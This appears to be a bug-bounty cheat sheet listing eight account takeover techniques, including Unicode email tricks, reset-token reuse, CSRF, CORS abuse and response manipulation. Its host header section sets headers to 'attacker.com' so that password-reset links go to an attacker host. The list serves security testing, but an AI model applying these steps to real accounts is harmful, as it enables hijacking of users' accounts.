Firing 8 Account Takeover Methods 🔥
1. Unicode Normalization Issue
- victim account
[email protected]
- create an account using Unicode
- example:
vić[email protected]
- list of Unicode character: https://en.wikipedia.org/wiki/List_of_Unicode_characters
- Note: check where verification doesn’t require
2. Authorization Issue
- change email of Account Aand put email
B
- check confirmation mail in account
B
- open the confirmation mail from account
C
- Taken over Account
C
3. Reusing Reset Token
- if target allows you to reuse the reset link then hunt for more reset link via
gau
,wayback
orurlscan.io
4. Pre Account Takeover
- signup using normal signup form as a hacker but hacker has no verification link.
- then if victim signs up using oauth .
- Verification bypass now attacker can login the victim account without verification link with the password he entered while registering.
5. CORS Misconfiguration to Account Takeover
- check api , any endpoint has access access token/session/secret/fingerprint
- if yes check for CORS misconfiguration does it allow us to fetch data from target?
- make a payload to fetch data and replace headers and boom
6. CSRF to Account Takeover
- if profile modification in cookie based authentication doesn’t generate any token
- open Account
A
change&Put email that you own click save intercept the request and generate a csrf poc. - if fully cookie based auth then you dont have to modify anything send the csrf file to victim.
- if it requires UUID/UserID or unique token it becomes hard to do that but that doesn't mean it is secure , just start playing with target
- hint: password reset page helps many times for UUID/GUID and UserID
7. Host Header Injection
- well in this case there are 4 ways do that.
- click reset password change
host
header. - or change proxy header ex:
X-Forwarded-For: attacker.com
- or change
host
,referrer
,origin
headers at once asattacker.com
- click reset then click resend mail and do all 3 methods above
8. Response Manipulation
- code manipulation * to
200 OK
- code and body manipulation
code * to
200 OK
body * to{"success":true}
or{}
it works when json is being used to transfer and receive data.
Credit
Based on 0xMaruf's writeup.
Support
You can Follow me on twitter or